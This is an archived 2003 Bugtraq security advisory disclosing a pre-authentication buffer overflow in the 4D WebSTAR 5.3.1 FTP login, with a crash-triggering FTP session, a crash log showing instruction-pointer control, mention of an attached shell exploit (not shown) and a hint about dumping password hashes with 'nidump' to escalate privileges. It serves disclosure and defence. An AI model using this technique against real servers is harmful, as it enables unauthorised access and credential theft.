4D WebSTAR FTP Buffer Overflow.

From: B-r00t (br00t_at_blueyonder.co.uk)
Date: 09/12/03

  • Next message: jelmer: "Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"
    Date: Fri, 12 Sep 2003 00:36:22 +0100 (BST)
    To: bugtraq@securityfocus.com, vuln-dev@securityfocus.com
    
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Remote Vulnerability in 4D WebSTAR Server Suite.
    ================================================

    Date: 11.09.2003
    Author: B-r00t. 2003.
    Email: B-r00t <br00t@blueyonder.co.uk>

    Vendor: 4D.
    Reference: http://www.4d.com/products/webstar.html
    Versions: 4D WebSTAR 5.3.1 (Latest) => VULNERABLE.
    Tested: 4D WebSTAR 5.3.1 (Trial Version).

    Exploit: [attached] 4DWS_ftp.c - Gives a shell on port 6969.

    Description: There is a pre authentication buffer overflow
                    that exists in the login mechanism of the WebSTAR
                    FTP service. As shown below: -

    $ ftp maki
    Connected to maki (192.168.0.69).
    220 FTP server ready.
    Name (maki:br00t): test
    331 User name OK, need password.
    Password: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcd
    530 FTP login failed.
    Login failed.
    421 Service not available, remote server has closed connection

                    The following information is reported in the crash
                    logfile '/Users/webstar/Library/Logs/CrashReporter/
                    WSWebServer.crash.log'

    **********

    Date/Time: 2003-09-08 09:25:24 +0100
    OS Version: 10.2.6 (Build 6L60)
    Host: maki

    Command: WSWebServer
    PID: 359

    Exception: EXC_BAD_ACCESS (0x0001)
    Codes: KERN_INVALID_ADDRESS (0x0001) at 0x61626364

    PPC Thread State:
      srr0: 0x61626364 srr1: 0x4000f030 vrsave: 0x00000000
       xer: 0x00000000 lr: 0x61626364 ctr: 0x90000e40 mq: 0x00000000
        r0: 0x61626364 r1: 0xf02874f0 r2: 0xa0007728 r3: 0xf0288cd0
        r4: 0xf02872e0 r5: 0x0000005e r6: 0x80808080 r7: 0x00000001
        r8: 0x30000000 r9: 0x00954e64 r10: 0xf02870aa r11: 0x00959e94
       r12: 0x00000000 r13: 0x00000000 r14: 0x00000000 r15: 0x00000000
       r16: 0x00000000 r17: 0x00000000 r18: 0x00000000 r19: 0x00000000
       r20: 0x00000000 r21: 0x00000000 r22: 0x00000000 r23: 0x0000000b
       r24: 0x00958fec r25: 0x00958fec r26: 0x58585858 r27: 0x58585858
       r28: 0x58585858 r29: 0x58585858 r30: 0x58585858 r31: 0x58585858

                    As can be seen from the crash dump, the application
                    has attempted to execute code at '0x61626364' which
                    is ASCII code for 'abcd'. Being able to influence the
                    applications execution process means it is possible
                    for an attacker to execute arbitrary code and thus
                    gain access to the target machine. Fortunately, the
                    service is running as the 'webstar' user which is not
                    an administrative account by default. However, once an
                    attacker has gained initial access to the target machine,
                    it is possible to access the system password hashes using
                    the 'nidump' utility and hence possibly gain admin (root)
                    priveleges if these hashes are cracked.

    FIX: Disable the FTP service until a fix is available.

    - --

    B#.
    - ----------------------------------------------------
    Email : B-r00t <br00t@blueyonder.co.uk>
    Key fingerprint = 74F0 6A06 3E57 083A 4C9B
                      ED33 AD56 9E97 7101 5462
    "You Would Be Paranoid If They Were Watching You !!!"
    - -----------------------------------------------------

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.1 (OpenBSD)

    iD8DBQE/YQb/rVael3EBVGIRAkYEAJ4nwg5Y1Adl39fHb8odXHU1ff+9mQCguC93
    uCfwpZGiZ7zig7iaLLTk17o=
    =LN7U
    -----END PGP SIGNATURE-----

    
    



  • Next message: jelmer: "Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code"

    Relevant Pages

    • Re: IPSwitch, Inc. WS_FTP Server
      ... > bounce attack as well as PASV connection hijacking. ... > The FTP bounce vulnerability allows a remote attacker to cause the ... > anonymously along with any internal addresses that the FTP server has ... That means it's got to handle a PORT ...
      (Bugtraq)
    • Re: Microsoft FTP Server problem on W2K?
      ... It is a UNISYS ClearPath mainframe system that is trying to FTP using ... passive mode to a MS FTP server. ... Currently the mainframe FTPs in ACTIVE mode. ... Since the mainframe pushes files to our customers over a WAN connection, ...
      (microsoft.public.inetserver.iis.security)
    • Re: how do i close an app that has no forms?
      ... FTP connections through Internet Explorer send info ... If you don't have a firewall ... > a connection is instantiated with a server. ... > a request is sent to the FTP server, ...
      (microsoft.public.vb.general.discussion)
    • Re: .NET CF Socket are behaving very strangely
      ... I analysed the FTP log and I notice that PASV ... limited range of ports forwarded to the ftp server that is different ... error "No connection could be made because the target machine actively ...
      (microsoft.public.pocketpc.developer)
    • 4D WebSTAR FTP Buffer Overflow.
      ... Connected to maki. ... 220 FTP server ready. ... remote server has closed connection ...
      (Vuln-Dev)